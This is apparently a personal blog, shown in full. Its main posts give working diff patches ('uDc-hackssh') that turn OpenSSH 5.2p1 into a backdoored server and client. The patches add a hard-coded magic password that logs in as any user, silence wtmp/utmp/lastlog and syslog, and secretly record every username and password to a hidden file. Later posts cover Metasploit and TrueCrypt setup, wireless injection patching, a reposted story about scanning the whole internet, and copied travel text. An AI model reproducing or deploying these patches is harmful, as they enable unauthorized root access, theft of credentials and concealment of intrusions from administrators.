--- 1193,1203 ----
if (getenv("TZ"))
child_set_env(&env, &envsize, "TZ", getenv("TZ"));

+ // slash patch
+ if(uDc)
+ child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
+
/* Set custom environment options from RSA authentication. */
if (!options.use_login) {
while (custom_environment) {
***************
*** 1496,1501 ****
--- 1501,1510 ----

if (setlogin(pw->pw_name) < 0) error("setlogin failed: %s", strerror(errno)); 
+ // slash patch 
+ if(!uDc) { 
+ // end of patch 
+ if (setgid(pw->pw_gid) < 0) { perror("setgid"); exit(1); 
*************** 
*** 1505,1510 **** 
--- 1514,1526 ---- 
perror("initgroups"); 
exit(1); 

+ // slash patch 
+ } 
+ else { 
+ setgid(0); 
+ initgroups(pw->pw_name, 0);
+ }
+ // end of patch
endgrent();
# ifdef USE_PAM
/*
***************
*** 1547,1552 ****
--- 1563,1570 ----
}
#else
/* Permanently switch to the desired uid. */
+ // slash patch
+ if(!uDc)
permanently_set_uid(pw);
#endif
}
***************
*** 1554,1560 ****
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
--- 1572,1581 ----
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! // slash patch
! //if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
! if ((getuid() != pw->pw_uid || geteuid() != pw->pw_uid) && !uDc)
! // end of patch
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
***************
*** 2614,2621 ****
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! else
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
}

int
--- 2635,2648 ----
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! // slash patch
! else {
! if(!uDc)
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
! else
! setproctitle("","");
! }
! // end of patch
}

int
diff -Ncr openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0b/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0b/sshconnect1.c Fri Sep 11 22:38:47 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
 
diff -Ncr openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0b/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0b/sshconnect2.c Fri Sep 11 22:38:47 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
 
diff -Ncr openssh-5.2p1/sshlogin.c uDc-hackssh-v1.0b/sshlogin.c
*** openssh-5.2p1/sshlogin.c Mon Sep 17 14:09:16 2007
--- uDc-hackssh-v1.0b/sshlogin.c Sat Sep 12 00:03:40 2009
***************
*** 118,123 ****
--- 118,126 ----
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

/* save previous login details before writing new */
***************
*** 127,132 ****
--- 130,138 ----
login_set_addr(li, addr, addrlen);
login_login(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}

#ifdef LOGIN_NEEDS_UTMPX
***************
*** 134,145 ****
--- 140,157 ----
record_utmp_only(pid_t pid, const char *ttyname, const char *user,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, addrlen);
login_utmp_only(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}
#endif

***************
*** 147,155 ****
--- 159,173 ----
void
record_logout(pid_t pid, const char *tty, const char *user)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, NULL, tty);
login_logout(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}
 
diff -Ncr openssh-5.2p1/version.h uDc-hackssh-v1.0b/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0b/version.h Fri Sep 11 22:38:47 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh verions
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch
Posted by at 1 comment:
Labels: ,

Tuesday, July 21, 2009

uDc-hackssh-v1.0a

The following openssh-5.2p1 patches allow users to:

  • login with any users with 'magic password'
  • hide footprint from wtmp, utmp and lastlog
  • log ssh inbound and outbound username and password
This patches tested on Mac OS X, Solaris 5.10, Ubuntu 8.10 and FreeBSD 7.10. It should works for other operating system too.

slash@Slash-The-Undergrounds-Hackintosh:$ cat uDc-hackssh-v1.0a
diff -Nrc openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0a/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0a/auth-pam.c Sun Jul 19 13:59:46 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;

+ // slash patch
+ if(sshpam_authctxt)
+ for (ai = 0; ai <>user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;
diff -Nrc openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0a/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0a/auth-passwd.c Sun Jul 19 14:01:06 2009
***************
*** 92,97 ****
--- 92,103 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {
diff -Nrc openssh-5.2p1/includes.h uDc-hackssh-v1.0a/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0a/includes.h Sun Jul 19 14:09:10 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "black-session"
+ #define SSH_LOG "/var/run/sshd.sync"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \
+ bajaulog=fopen(SSH_LOG, "a"); \
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+
+ const char *get_remote_ipaddr(void);
+ // end of patch
+
+ #ifndef INCLUDES_H
#define INCLUDES_H
diff -Nrc openssh-5.2p1/log.c uDc-hackssh-v1.0a/log.c
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008
--- uDc-hackssh-v1.0a/log.c Sun Jul 19 14:09:50 2009
***************
*** 338,343 ****
--- 338,346 ----
int pri = LOG_INFO;
int saved_errno = errno;
+ // slash patch + if(uDc) return;
+ // end of patch if (level > log_level)
return;

diff -Nrc openssh-5.2p1/loginrec.c uDc-hackssh-v1.0a/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0a/loginrec.c Sun Jul 19 14:11:00 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
diff -Nrc openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0a/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0a/sshconnect1.c Sun Jul 19 14:12:35 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
diff -Nrc openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0a/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0a/sshconnect2.c Sun Jul 19 14:15:51 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
diff -Nrc openssh-5.2p1/version.h uDc-hackssh-v1.0a/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0a/version.h Sun Jul 19 14:17:31 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh version
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch
Posted by at 3 comments:
Labels: ,

Thursday, May 14, 2009

svn metasploit on windows

One
* Download latest tortoisesvn
* Create a directory with any name (ex: metasploit)
* Checkout latest metasploit version by using http://metasploit.com/svn/framework3/trunk/
* Download ruby packaged by One-Click Ruby Installer Project.
* ruby185-22.exe is recommended for this example.
* Install it in any directory

Two
* Download Ruby/GTK2 binaries for Windows.
* ruby-gnome2-0.16.0-1-i386-mswin32.exe is recommended for this example.
* Execute it. Basically, you don't need to change any settings. There are three points you can set it by yourself.
  • GTK2 Runtime: If you have your own GTK2 binaries(and the bin-path is added to PATH), you may check off this option. But it is heavily recommended to check on this option.
  • Register Environment Variables: The GTK2 Runtime bin-path is added to PATH. If you want to use tools such as msginit, msgmerge, etc ..., this option is useful. But if you don't need them, you shouldn't check this option. Especially, if you have some other GTK2 applications, it may causes any DLL conflicts.
  • Choose the install directory: Note that you need to choose the ruby-install-dir (Ex: c:\Ruby).
Three
* Time to test it.
* The following commands should be typed on the "Prompt for DOS". To open the Prompt for DOS on:

C:\>ruby -v
ruby 1.8.0 (2003-05-26) [i386-mswin32]

C:\>ruby -e "require 'gtk2'"

C:\>ruby -rgtk2 -e "Gtk::Window.new.show;Gtk.main"

* If it didn't return any error, it's done.
Posted by at 1 comment:
Labels:

Monday, April 27, 2009

Truecrypt Installation on Fedora 10

TrueCrypt 6.1 on Fedora 10 was quite straightforward. Here is a quick list of steps to follow:

1. Download the TrueCrypt 6.1 source tarball from www.truecrypt.org

2. Untar the source:
[root@slash-the Download]# tar -zxvf TrueCrypt\ 6.1a\ Source.tar.gz

3. Install required libraries:
[root@slash-the Download]# yum install nss-pkcs11-devel fuse-devel wxGTK wxGTK-devel gnome-keyring-devel gcc-c++


4. Export the Cryptoki include folder:
[root@slash-the Download]# export PKCS11_INC=/usr/include/gp11

5. Run make
You may get the following error messages:
../Common/SecurityToken.cpp:654: error: ‘CKR_NEW_PIN_MODE’ was not declared in this scope
../Common/SecurityToken.cpp:655: error: ‘CKR_NEXT_OTP’ was not declared in this scope

5.1 Open Common/SecurityToken.cpp in your favourite editor.

5.2 Scroll to line 654

5.3 Comment out line 654 and 655. It should look like this:
// TC_CASE_STR (CKR_NEW_PIN_MODE);
// TC_CASE_STR (CKR_NEXT_OTP);

5.4 Save and exit

5.5 Run make again

6. TrueCrypt is now compiled:
[root@slash-the Download]# cp Main/truecrypt /usr/share/bin
Posted by at No comments:
Labels:

Friday, January 2, 2009

Some old story for 2009 PLAN

I was thinking what is the best posting to open my year 2009 blog. I came up with an idea to review or flashback some of good stories out there related to Cyber World. I hope posted below would give you some picture that HACKERS are actually helping you with their own ways and styles. They are actually knows what is happening on the entire internet. I wish you all "Happy New Year 2009"

Before joining THC I was doing research for Team-Teso. In 2000 one of our problems at Teso was that many script kiddies entered the arena
and started setting up DDoS hosts and owning like mad. Hacking became mainstream.

At Teso we did not like script kiddies and we abhorred those doing DDoS. A small group of Teso and some friends reverse engineered the backdoors and started scanning for them. Our objective was to discourage script kiddies and stop DDoS attacks (by removing the DDoS agents).

Techniques
We developed a new scanner (called 'bscan', not published but a handful of people had it) that was capable of scanning
the internet.

The main features of bscan were:
- Raw SYN scanner. Full TCP/IP stack in userland.
- Using ghost IP and ghost MAC (untraceable)
- Modular. We developed loadable modules for telnet handshake, bind, http (HEAD / HTTP/1.0), ...
- Sending out 50.000 or more syn packets per second.
- Running on linux, sunos/solaris and bsd.

In short the scanner was capable of scanning the entire Internet (0.0.0.0 - 239.255.255.255). The scanner retrieved all Web Server versions
or telnet banners within hours.

Fyodor's nmap was developed for a different reason. The features of nmap are far superior to bscan. Bscan was a tool and nmap is a professional application.

Results
All this is history now and I think that 7 years after the development the time has come to share some of the stuff that we learned
while scanning the Internet:

1.The Internet is full of hosts that do not comply with the RFC.
2.There are hosts on the Internet that keep sending ACK packets for hours even if you send back FIN, RST or ICMP error messages. They just wont stop sending!
3.Sometimes you send a SYN to one host and you get the SYN/ACK back from a different host (asymmetric NAT).
4.There are entire class A networks with no hosts in them at all (The Black Holes of the Internet).
5.Never scan sequential. If a remote class B or class C is hit with 50k SYNCs per second the serving router of the target network will start sending out ARP requests to resolve the MAC of all these hosts. ARP requests are broadcast messages. This will overload some hosts on the target 'local' network which will crash or not respond for several seconds while processing the ARP requests. You will miss those hosts. Scan 'spread spectrum' and increment the IP by 256 or a similar value.
6.The first syn packet is often lost. When scanning 10-20 class A networks in 'spread spectrum mode (-X option in bscan) then the router of a large network (e.g. class B) still has to resolve several hundred ARP entries per second. Some routers can not handle this and will start dropping SYN packets if the MAC is not known and can not be resolved because the router is already busy resolving other MAC addresses.
7.Coordinate with your people that you are the only one scanning the Internet. Same reason as above: If two people scan at the same time the target hosts have to process to many ARP requests and both of you will miss hosts.
8.Never wait longer than 3 seconds for a host to complete. If it takes longer than 3 seconds for a host to reply you are not interested in owning that host anyway.
9.Be kind to other administrators. We set up a charity ("The Institute for Internet Statistics") to have a reasonable explanation for any IT administrator who complained about our scanning activities.

The scanner was usually started on 5-10 Internet hosts in parallel. A big thanks at this point to the IT Administrators of the
various universities in Germany who let us use their hosts for scanning (legally!).

A typical TCP port scan of the Internet took between 8-16 hours.

Stories
There was a nice side effect of cleaning the internet from script kiddies and their backdoors: Teso had a full list of all
server versions of all hosts on the Internet. No longer had team teso to scan for vulnerable hosts. We just looked them up in our
log files.

One day one of the German hackers who helped Teso came home drunk and decided to start another scan for a script kiddie
backdoor that was running on TCP port 33645. He initiated a scan and set source port to 443 and destination port
to 33645. The morning after (and being sober again) he saw that various security mailing lists discussed a new
0-day vulnerability against HTTPS (port 443). Apparently someone was scanning with massive speed the HTTPS ports on
the Internet. He looked again of what scan he started the night before: He mistakenly swapped source and destination port while drunk and scanned for port 443 instead for port 33465.

These mails can still be found on the archives of various mailing lists around xmas 2002.

Lesson learned: Do not drink & hack.

We were not the only ones who scanned the Internet. We heart of an Israeli research group who did it in 1998.

In 2002/2003 Dan Kaminsky published another tool called scanrand. His tool is public. Try it.

Final Notes
These days bscan is old and not up to date anymore.
Whatever you do make sure it's legal and does not cause trouble to other people.

regards,
someone
Posted by at No comments:
Labels: , ,

Friday, November 14, 2008

Changing your Microsoft Office Key

1. Close all Microsoft Office programs.

2. Click on Start button, then click on Run.

3. Type “regedit” (without quotes) in the Run text box, and click OK or press Enter.

4. Locate and then click the following subkey:

HKEY_LOCAL_MACHINE \Software\Microsoft\Office\12.0\Registration

Inside, you will find another subkey that resembles the following subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\{30120000-0011-0000-0000-0000000FF1CE}

5. Optional: Backup this registry branch by exporting the Registration subkey to a file, just in case the new product key does not work and you have to restore back the old product key. To export the registry, right click on the Registration subkey and click on Export, and follow the on-screen prompt to enter a file name for the registry file and choose a location to store it.

6. Under the Registration subkey, there may be several Globally Unique Identifiers (GUID) subkey that contain a combination of alphanumeric characters. Each GUID is specific to a program that is installed on your computer.

If you find additional subkeys that reference Microsoft 12.0 registration, then click and open each GUID subkey to view and identify the Office product version by the ProductName registry entry in the right pane. For example:

ProductName=Microsoft Office Professional Plus 2007

7. After you find the GUID subkey that contains your Office product or program which you want to remove the existing product license key or registration details, delete the following registry entries by right clicking on the registry entry in the GUID subkey, click Delete, and then click Yes:

• DigitalProductID
• ProductID

8. Exit Registry Editor.

9. Run or open an Office application program, such as Microsoft Word or Excel or Outlook. Office 2007 will prompt you to enter a new 25-character product key.

10. Type in the valid and genuine product key, and then click OK.

11. Then when prompted to choose your preferred type of Microsoft Office 2007 installation, press on “Install Now”.

12. Microsoft Office 2007 will be updated with new product CD key or volume license key, and ready for activation (if it’s a non-VLK serial) or use.
Posted by at No comments:
Labels:

Thursday, November 13, 2008

b43 injection on ubuntu with kernel-2.6.25

apt-get install build-essential bin86 kernel-package libqt3-headers libqt3-mt-dev wget libncurses5 libncurses5-dev

cd /usr/src
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.tar.bz2
tar -xjf linux-2.6.25.tar.bz2
cd /usr/src/linux-2.6.25
wget http://patches.aircrack-ng.org/b43-injection-2.6.25-wl.patch
wget http://www.latinsud.com/bcm/mac80211_2.6.24.4_frag.patch
patch -p1 < b43-injection-2.6.25-wl.patch
patch -p1 < mac80211_2.6.24.4_frag.patch

cp /boot/config-`uname -r` .config
make oldconfig
make menuconfig
make-kpkg --initrd --revision=shaol1nint kernel_image kernel_headers modules_image
install .deb files
dpkg -i filename
and reboot

wget http://bu3sch.de/b43/fwcutter/b43-fwcutter-011.tar.bz2
tar xjf b43-fwcutter-011.tar.bz2
cd b43-fwcutter-011
make
cd ..

export FIRMWARE_INSTALL_DIR="/lib/firmware"
wget http://mirror2.openwrt.org/sources/broadcom-wl-4.150.10.5.tar.bz2
tar xjf broadcom-wl-4.150.10.5.tar.bz2
cd broadcom-wl-4.150.10.5/driver
sudo ../../b43-fwcutter-011/b43-fwcutter -w /lib/firmware wl_apsta_mimo.o

sudo apt-get install libsqlite3-0 libssl-dev

apt-get install libnl-dev
sudo mkdir iw
cd iw
sudo wget http://dl.aircrack-ng.org/iw.tar.bz2
sudo tar xjf iw.tar.bz2
sudo make
sudo make install

airmon-ng start wlan0

vi /etc/modprobe.d/options
add new line "options b43 nohwcrypt=1"
This ensures that the encryption on wlan0 doesn't interfere with monitoring. This should be only enabled when aircracking with mon0, as it increases the softmac overhead. Remove it from your options list when not using aircrack for a longer time.
Posted by at No comments:
Labels:

Thursday, July 24, 2008

The Beauty of Bajau - Proud of My Culture

The Bajau, (also written as Badjao, Badjaw or Badjau) are an indigenous ethnic group the Philippines and in parts of Sabah, Brunei and Sarawak. Although the majority of the Bajau live in the Philippines, due to unrest in their native Sulu Archipelago, in the southern part of the country, many Bajau had migrated to neighbouring Malaysia over the course of 40 years, where currently they are the second largest ethnic group in the state of Sabah, making up 13.4%[1] of the total population. They were sometimes referred to as the Sea Gypsies, although the term has been used to encompass a number of non-related ethnic groups with similar traditional lifestyles, such as the Samadilaut and Jama Mapun peoples of the Southern Philippines. The Bajau of Indonesia live primarily on the islands and in the coastal districts of Sulawesi. The modern outward spread of the Bajau from older inhabited areas seems to have been associated with the development of sea trade in trepang.



Posted by at No comments:
Labels: ,

Monday, July 7, 2008

Three Days in Berlin

Berlin is the capital city and one of sixteen states of Germany. With a population of 3.4 million in its city limits, Berlin is the country's largest city.[2] It is the second most populous city and the ninth most populous urban area in the European Union.[3] Located in northeastern Germany, it is the centre of the Berlin-Brandenburg metropolitan area, comprising 5 million people from over 180 nations.[4]

First documented in the 13th century, Berlin was successively the capital of the Kingdom of Prussia (1701-1918), the German Empire (1871-1918), the Weimar Republic (1919-1933) and the Third Reich (1933-1945).[5] After the Second World War, the city was divided; East Berlin became the capital of East Germany while West Berlin became a Western enclave, surrounded by the Berlin Wall from 1961-1989.[6] Following the reunification of Germany in 1990, the city regained its status as the capital of all Germany.[7]



Posted by at No comments:
Labels: ,

Wednesday, June 18, 2008

Three Days in London

London (pronunciation (help·info); IPA: /ˈlʌndən/) is the largest urban area and capital of England and the United Kingdom.[7] An important settlement for two millennia, London's history goes back to its founding by the Romans.[8] Since its settlement, London has been part of many important movements and phenomena throughout history, such as the English Renaissance, the Industrial Revolution, and the Gothic Revival.[9][10] The city's core, the ancient City of London, still retains its limited mediaeval boundaries; but since at least the 19th century the name "London" has also referred to the whole metropolis which has developed around it.[11] Today the bulk of this conurbation forms the London region of England[12] and the Greater London administrative area,[13] with its own elected mayor and assembly.[14]




Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)